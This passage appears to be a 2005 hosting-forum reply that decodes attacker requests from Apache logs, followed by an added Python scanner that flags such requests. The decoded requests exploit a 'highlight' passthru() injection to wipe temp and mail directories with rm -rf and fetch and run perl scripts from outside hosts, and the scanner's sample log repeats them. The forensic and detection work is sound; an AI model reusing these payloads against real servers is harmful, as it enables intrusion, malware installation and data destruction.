GET /showthread.php?t=9840&rush=echo _START_; cd /tmp; rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /usr/local/apache/proxy/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;killall -9 wget; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527

GET /showthread.php?t=8240&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

is

GET /showthread.php?t=8240&rush=echo _START_; cd /tmp; rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /usr/local/apache/proxy/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527

GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

is

GET /printthread.php?t=440&rush=echo _START_; cd /tmp; wget security.cnc.net/bot.txt;wget security.cnc.net/worm.txt;perl worm.txt;rm worm.txt;perl bot.txt;rm bot.txt; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527';
In your case the attempt on "/usr/local/apache/proxy/" did work, so you got the files in there. Unfortunately none of the URLs above work any more, so I can't find out what the perl scripts do; I guess they download more files and do something else.
Someone might have used this script to exploit you:
http://www.k-otik.com/exploits/20041...pbb2010.pl.php
Are you sure it's vBB 3.0.5? It looks like the phpBB highlight exploit code.
Last edited by sehe; 01-12-2005 at 03:26 PM.
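An added example, not part of the thread, covering both the `grep -i wget` approach in posts #7 and #8 and the by-hand decoding in post #11. It parses domlog lines in the grep-prefixed format posted above, percent-decodes each query parameter until it stops changing (the payload double-encodes the single quote, `%2527` to `%27` to `'`, so that it only becomes a quote after the application decodes it a second time), and reports only requests whose `highlight` parameter carries a PHP execution sink fed from another request variable, together with the shell commands, download URLs and scripts that variable passed. The sample log is constructed: the first two lines are shortened copies of two of the entries posted above, the last two are benign lines added to show that a plain grep for wget both over-matches (a legitimate search for "wget") and would miss a payload that hex-encoded the word.

```python
import re
from urllib.parse import unquote

# Constructed sample in the grep-prefixed cPanel domlog format shown in the
# thread. Lines 1-2 are shortened copies of two posted entries (same payload
# shape); lines 3-4 are benign requests added to show what must not be flagged.
SAMPLE_LOG = (
    '/usr/local/apache/domlogs/domain.com:209.126.164.246 - - [01/Jan/2005:21:58:17 +0000] '
    '"GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;'
    'wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;'
    'perl%20sess_189f0f0889555397a4de5485dd611111;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_'
    '&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527 HTTP/1.0" 200 47435 "-" "LWP::Simple/5.43"\n'
    '/usr/local/apache/domlogs/domain.com:193.210.126.79 - - [10/Jan/2005:04:30:31 +0000] '
    '"GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;'
    'wget%20%0Asecurity.cnc.net/bot.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F'
    "&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; "
    'HTTP/1.1" 200 2864 "-" "LWP::Simple/5.79"\n'
    '/usr/local/apache/domlogs/domain.com:198.51.100.20 - - [10/Jan/2005:05:00:00 +0000] '
    '"GET /viewtopic.php?t=12&highlight=wget HTTP/1.1" 200 1234 "-" "Mozilla/5.0"\n'
    '/usr/local/apache/domlogs/domain.com:198.51.100.21 - - [10/Jan/2005:05:01:00 +0000] '
    '"GET /showthread.php?t=9840 HTTP/1.1" 200 47435 "-" "Mozilla/5.0"\n'
)

# Apache combined log line, optionally prefixed with "<file>:" as grep prints it.
LOG_RE = re.compile(
    r'^(?:(?P<file>[^\s:]+):)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# PHP execution sink fed from a request variable, e.g. passthru($HTTP_GET_VARS[rush])
SINK_RE = re.compile(
    r"(?P<func>passthru|system|exec|shell_exec|popen)\s*\(\s*"
    r"\$(?:HTTP_GET_VARS|HTTP_POST_VARS|_GET|_POST|_REQUEST)\s*\[\s*['\"]?(?P<param>\w+)['\"]?\s*\]"
)
DOWNLOADERS = {"wget", "curl", "fetch", "lwp-download"}
INTERPRETERS = {"perl", "python", "sh", "bash", "php"}


def decode_fully(value, max_rounds=4):
    """Percent-decode until the text stops changing (bounded), so %2527 -> %27 -> '."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_request(target):
    """Return None for a benign request, else details of the injected command."""
    path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        params[unquote(key)] = decode_fully(raw)
    sink = SINK_RE.search(params.get("highlight", ""))
    if sink is None:
        return None
    shell = params.get(sink.group("param"), "")
    # normalise whitespace: the payload hides %0A newlines inside "wget <host>"
    commands = [" ".join(c.split()) for c in shell.split(";") if c.strip()]
    urls, scripts = [], []
    for cmd in commands:
        tokens = cmd.split()
        args = [t for t in tokens[1:] if not t.startswith("-")]
        if tokens[0] in DOWNLOADERS:
            urls.extend(args)
        elif tokens[0] in INTERPRETERS:
            scripts.extend(args)
    return {"path": path, "sink": sink.group("func"), "param": sink.group("param"),
            "commands": commands, "download_urls": urls, "scripts": scripts}


def scan_log(text):
    """One dict per log line that carries a decoded command-injection payload."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyse_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"),
                           status=m.group("status"), ua=m.group("ua"))
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} {h["path"]} via {h["sink"]}(${h["param"]}) '
              f'status={h["status"]} ua={h["ua"]}')
        for c in h["commands"]:
            print("    ", c)
        print("     downloads:", h["download_urls"], "runs:", h["scripts"])
```

Feed it `cat /usr/local/apache/domlogs/* | python3 scan.py` style input instead of `SAMPLE_LOG` to get the list of source IPs, download hosts and dropped file names to block and hunt for; a status of 200 on a hit means the command actually ran under the web server user, which is exactly the nobody-owned process tree in post #1.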